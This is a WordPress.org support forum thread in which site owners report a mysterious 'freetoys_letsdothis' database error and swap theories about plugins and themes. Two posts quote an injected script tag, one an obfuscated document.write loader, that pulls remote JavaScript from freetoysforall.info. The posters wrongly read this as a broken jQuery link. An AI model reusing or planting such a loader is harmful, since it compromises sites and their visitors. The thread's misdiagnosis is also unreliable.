WordPress.org

Ready to get started?Download WordPress

Forums

FREETOYS_LETSDOTHIS (14 posts)

  1. Gabriel
    Member
    Posted 2 years ago #

    Couldn't connect to database server.Couldn't find database freetoys_letsdothis.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM <code>statscurl</code> WHERE statscurl_ip = '';

    Anyone else getting this error? Do a google search for "freetoys_letsdothis" and you'll see a bunch of pages are getting this error. Mine is at http://thekeytowhy.com/blog. The blog page is the only page getting the error. It shows up momentarily on screen before the page loads, then after page load it's still in the page source shortly after <body>.

    It just recently showed up after I installed a few plugins:
    Advanced Access Manager
    bbPress Admin Bar Addition
    WP Custom Admin Bar

    It persists after the plugins are deactivated. I suspect WP Custom Admin Bar. But since removing it doesn't help, I don't know what to do. I've been tearing through all my code, but I'm stumped. Please help

  2. Gabriel
    Member
    Posted 2 years ago #

    I did a word search of every file in my site and the database, and "freetoys_letsdothis" is no where to be found.... Where is this coming from?!?

  3. Gabriel
    Member
    Posted 2 years ago #

    I'll look at this more tomorrow, but I did just now notice all my header info on the blog page (css includes, js, etc.) is loading into the <body>, whereas all my other pages are correctly loading it into the header. Strange.

  4. maverick3000
    Member
    Posted 2 years ago #

    I getting the above error as well. Started seeing it yesterday. Removed all new plugins and deactivated the rest = Error remains.

    Removed ReviewIt theme as It started happening when I installed this = Error remains.

    If you find a solution - Would really appreciate to hear about it.

  5. theotherlebowski
    Member
    Posted 2 years ago #

    are you using statspress?

  6. maverick3000
    Member
    Posted 2 years ago #

    I'm certainly not. Its was pretty much a new site so I;m just going to do a clean install of WP - as have spent way to much time trying to resolve this.

  7. everydayreviews
    Member
    Posted 2 years ago #

    I am having the same problem!!!! Any idea how to fix this? please help

  8. Gabriel
    Member
    Posted 2 years ago #

    OK, I can confirm that this error is indeed causing my includes to load into <body> rather than <header>. My offline older copy isn't suffering from this problem, and loads everything properly from the header even on my blog page. That may help narrow it down.

    Can you guys list off the last few modifications to your site before the error popped up? There must be something in common. Also, everyone should provide links to their blog where the error shows, so we can look for commonalities.

    Also, following is my list of all installed plugins. Not all were activated when the error showed up, but the error remains after all plugins are disabled, so it may relate to something modified from installation? If someone posts the plugins they have in common with me, and each person posts the ones in common with the previous person, we may be able to narrow down a single plugin we all have in common:

    Advanced Access Manager
    Akismet
    bbPress
    bbPress Admin Bar Addition
    Breadcrumb NavXT
    Coming Soon Pages [Free]
    Demo Data Creator
    Facebook
    Facebook Page Promoter Lightbox
    Fontific
    Jetpack by WordPress.com
    Line Break Shortcode
    Per Post Scripts & Styles
    Search Everything
    Lockerz / AddToAny
    ShortCodes UI
    Simple Facebook Connect
    Select Sociable Sociable
    Sync Facebook Events
    The Events Calendar
    Ultimate Google Fonts
    WP-FB-AutoConnect
    WP-PageNavi
    WP Custom Admin Bar

    Plus all Duotive-Fortune plugins included in the theme.

  9. maverick3000
    Member
    Posted 2 years ago #

    I reinstalled WP and Duotive-Fortune theme is working fine now.
    But I think it must be to do with a plugin within Duotive-Fortune.

    Other plugins I had from the list were:

    all Duotive-Fortune plugins
    WP-PageNavi
    Breadcrumb NavXT
    Akismet

    Hope you find a solution > I'm guessing if you already have a site built, you don't have the opportunity to completely reinstall WP.

  10. Gabriel
    Member
    Posted 2 years ago #

    You know, I got frustrated and took a break a few days to work on graphics, and now the error is gone! My header/body is normal again, and guess what? I found this in my header:

    <script src="http://www.freetoysforall.info/letsdothis/jquery.js" type="text/javascript">

    So this is an error related to jQuery. The website must of went down. I'm still a little confused, because that address is no where to be found in any file in my site, so it's probably a forwarded address. Duotive-Fortune includes a hard copy of jQuery, so I'm not sure if the theme is to blame either. It only ever happened on my blog page, no where else.

    everydayreviews, are you using Duotive-Fortune as well?

    Well, at least I know where to start looking if it happens again. I wouldn't call this problem solved since we don't know where it came from or how to fix it, so I'll leave this topic unresolved.

  11. maverick3000
    Member
    Posted 2 years ago #

    Thanks for the info. I just a clean install and all is right in the world now...'but if it happens again'.

    Yes I was using Duotive-Fortune.

    Thanks

  12. everydayreviews
    Member
    Posted 1 year ago #

    no, im using a review theme. It wasn't doing it for a while and it just appeared again today. annoying for sure

  13. nugfx
    Member
    Posted 1 year ago #

    im having a similar problem, yesterday this script just appeared on my blog page only on line 1 of code (online view)

    <script type="text/javascript"> if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.freetoysforall.info/letsdothis/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.freetoysforall.info/letsdothis/jquery.js"></scr'+'ipt>'); } </script>

    has anyone resolved this of figured out how to remove this, please help as its becoming a MAJOR BALL ACHE!

  14. WPyogi
    Volunteer Moderator
    Posted 1 year ago #

    @nugfx - start your own thread -- posting in an old thread is not the best way to get help and you do not have the same issue.

Topic Closed

This topic has been closed to new replies.

About this Topic